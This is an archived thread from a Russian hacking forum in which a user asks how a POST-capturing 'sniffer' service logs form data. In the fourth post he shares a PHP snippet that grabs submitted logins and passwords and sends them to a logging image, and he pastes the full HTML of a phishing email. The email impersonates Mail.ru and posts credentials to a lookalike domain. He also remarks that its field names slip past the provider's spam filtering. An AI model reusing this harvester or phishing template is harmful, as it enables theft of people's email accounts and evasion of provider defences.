Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Перехват POST запроса?

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Первый вопрос] >> Перехват POST запроса?
Имя
Сообщение << Старые топики   Новые топики >>
Перехват POST запроса? - 2010-01-09 17:50:03.823333   
вoрон

Сообщений: 5
Оценки: 0
Присоединился: 2010-01-08 22:52:53.656666
Подскажите как должен выглядеть скрипт с перехватом POST для сниффера,я представляю что это $_SERVER['QUERY_STRING'] перехватывает после знака ?,но как организовать это?
То есть к примеру отправляю письмо в HTML и как мне сделать что бы перехватывалось всё после формы
action. Я не имею ввиду фейки,просто стало интересно как работает сниффер на http://hacker-pro.net/sniffer/
Post #: 1
RE: Перехват POST запроса? - 2010-01-09 18:06:38.050000   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
http://forum.xakep.ru/m_1546613/tm.htm - изучай
если чтото непонятно - пиши
Post #: 2
RE: Перехват POST запроса? - 2010-01-09 18:16:27.480000   
janitor

Сообщений: 100
Оценки: 0
Присоединился: 2009-09-11 15:33:08.426666
после знака вопроса параметры, передающиеся GETом. POST передается "незаметно"

ловить
$_GET
$_POST

$_SERVER['QUERY_STRING'] - вернет часть строки, после вопроса, которую придется еще обрабатывать
Post #: 3
RE: Перехват POST запроса? - 2010-01-09 18:25:50.933333   
вoрон

Сообщений: 5
Оценки: 0
Присоединился: 2010-01-08 22:52:53.656666
Спасибо,с работай сниффера я знаком,я переделывал сниффер Kanick:
&lt;?php $login = $_POST['Login']; $Pass = $_POST['Password']; $string_writetosn = "Login: $login | Pass: $Pass"; $string_writetosn = str_replace(' ','+',$string_writetosn); header("Location: /s.gif? . $string_writetosn"); ?&gt; Где перехватывается Login и Password после знака ?
Вопрос в в другом,к примеру мне пришло письмо вида:
&lt;table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"&gt;&lt;tr&gt; &lt;td id=aj_bоdу&gt; &lt;div id=let_bоdу&gt;&lt;base href="http://win.mail.ru/cgi-bin/readmsg"&gt;&lt;xHTML&gt;&lt;xHEAD&gt;&lt;xMETA NAME=GENERATOR Content=Microsoft DHTML Editing Control&gt;&lt;/xHEAD&gt;&lt;xbоdу&gt;&lt;xHTML&gt;&lt;xHEAD&gt;&lt;xMETA NAME=GENERATOR Content=Microsoft DHTML Editing Control&gt;&lt;/xHEAD&gt; &lt;xbоdу&gt; &lt;img src=http://s15.radikal.ru/i188/0909/ac/b259bcffa673.bmp border=0&gt;&lt;br&gt; &lt;p&gt;Здравствуйте!&lt;/p&gt; &lt;p&gt;В связи с поступившими жалобами на рассылку рекламных писем (спам) с вашего электронного адреса, администрация вынуждена заблокировать Вашу учетную запись.&lt;/p&gt; &lt;p&gt;Для продолжения пользования электронным адресом, Вам необходимо подтвердить, что Ваш электронный адрес не используется спам-ботом для рассылки рекламных писем.&lt;/p&gt; &lt;b&gt;&lt;font color=#ff0000&gt;Это первое извещение, после третьего извещениея Ваша учётная запись будет удалена. Все письма, отправленные на Ваш электронный адрес будут переданы обратно отправителю.&lt;/font&gt;&lt;/b&gt;&lt;p&gt;&lt;/p&gt;&lt;font color=#003366 face=Times roman=new=&gt; &lt;/font&gt;&lt;p&gt;&lt;font color=#003366 face=Times roman=new=&gt;Для подтверждения электронного адреса &lt;a href=http://win.rnnail.ru/cgl-bin/login/ target=filtered-оnclick=return cfm(this);= оnclick="return cfm(this);" &gt;test@mail.ru&lt;/a&gt;, заполните форму ниже:&lt;/font&gt;&lt;/p&gt; &lt;div&gt;&lt;/div&gt;&lt;/XHTML&gt; &lt;DIV&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/Tbоdу&gt;&lt;/TABLE&gt; &lt;table width=100% cellpadding=0 cellspacing=0 border=0 class=login&gt; &lt;form method=post action=//win.rnnail.ru/forma/forma.php target=_self filtered-onsubmit =return CheckForm(this);&gt; &lt;input name=mail value=1 type=hidden&gt; &lt;tr&gt; &lt;td width=75&gt; &lt;img src=http://img.mail.ru/0.gif height=1&gt;&lt;br&gt;&lt;font&gt;&lt;b&gt;И&lt;/b&gt;&lt;/font&gt;&lt;b&gt;мя&lt;/b&gt; &lt;/td&gt; &lt;td width=150&gt; &lt;input name=Sysvar1 value= readonly&gt; &lt;/td&gt; &lt;td width=75&gt; &lt;select name=Sysdo&gt; &lt;option value=mail.ru selected&gt;@mail.ru&lt;/option&gt; &lt;option value=inbox.ru&gt;@inbox.ru&lt;/option&gt; &lt;option value=list.ru&gt;@list.ru&lt;/option&gt; &lt;option value=bk.ru&gt;@bk.ru&lt;/option&gt; &lt;/select&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt; &lt;font&gt;&lt;b&gt;П&lt;/b&gt;&lt;/font&gt;&lt;b&gt;ap&lt;font&gt;o&lt;/font&gt;ль&lt;/b&gt; &lt;/td&gt; &lt;td&gt; &lt;input name=Sysvar2&gt; &lt;/td&gt; &lt;td&gt; &lt;a href=http://win.rnnail.ru/cgl-bin/login/ target=filtered-оnclick=return cfm(this);= оnclick="return cfm(this);" &gt;Забыли &lt;font&gt;п&lt;/font&gt;ap&lt;font&gt;o&lt;/font&gt;ль?&lt;/a&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt; &lt;font&gt;&lt;b&gt;Код&lt;/b&gt; &lt;/font&gt;&lt;/td&gt; &lt;td&gt; &lt;input name=system_var3&gt; &lt;/td&gt;&lt;td&gt;&lt;img src=http://win.rnnail.ru/forma/image.jpg alt=border=0 vspace=2&gt;&lt;/td&gt; &lt;td&gt; &lt;/td&gt;&lt;/tr&gt;&lt;tr&gt; &lt;td&gt; &lt;/td&gt; &lt;td&gt; &lt;input name=level value=1 id=alien type=checkbox&gt;&lt;label for=alien&gt;Чужой компьютер&lt;/label&gt; &lt;/td&gt; &lt;td&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt; &lt;/td&gt; &lt;td&gt; &lt;input value=Подтвердить type=submit xxxxxxxxxxxstyle=margin-top:4px&gt; &lt;/td&gt; &lt;td&gt; &lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;p&gt;После удачной авторизации, в течение суток Вам будет выслано письмо с инструкциями как защитить свой электронный адрес от нежелательной корреспонденции. Чтобы подробней узнать об услуге — посетите &lt;a href=http://win.rnnail.ru/cgl-bin/login/ target=filtered-оnclick=return cfm(this);= оnclick="return cfm(this);" &gt;Corp.Mail.Ru&lt;/a&gt;&lt;br&gt;&lt;/p&gt; &lt;p&gt;Эти меры принимаются в связи с возросшим количеством нежелательных писем, получаемых пользователями @mail.ru. Администрация вынужденна ужесточить политику борьбы со спамом. Приносим свои извинения.&lt;/p&gt;&lt;/FORM&gt; &lt;/xbоdу&gt; &lt;/xHTML&gt; Где сразу видно что не задействованы Login и Password почему и проходит фильтрацию на mail.ru.И при замене всё приходит.
Вопрос в другом,как перехватывает это сниффер на hacker-pro.

Цитата:(Скрипт перехватывает POST запрос (ключи и параметры) и пишет их в ваш лог. Для того чтобы перехватить POST запрос нужно заменить в html коде формы атрибут action на скрипт-обработчик, который перехватывает запрос. Если установлено поле urltogogo, то после перехвата POST запроса пользователь автоматически перенаправляется на заданную страницу)
Post #: 4
RE: Перехват POST запроса? - 2010-01-09 19:05:42.896666   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
А ты не пробывал s.gif открыть блокнотом?
Post #: 5
RE: Перехват POST запроса? - 2010-01-12 10:50:34.763333   
вoрон

Сообщений: 5
Оценки: 0
Присоединился: 2010-01-08 22:52:53.656666
quote:

А ты не пробывал s.gif открыть блокнотом?

Так я и не понял что что этим вы хотели мне показать?От балды наверно взяли что бы от новичков быстрей избавится.
Вопрос решил сам,всем спасибо.
Post #: 6
Страниц:  [1]
Все форумы >> [Первый вопрос] >> Перехват POST запроса?







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.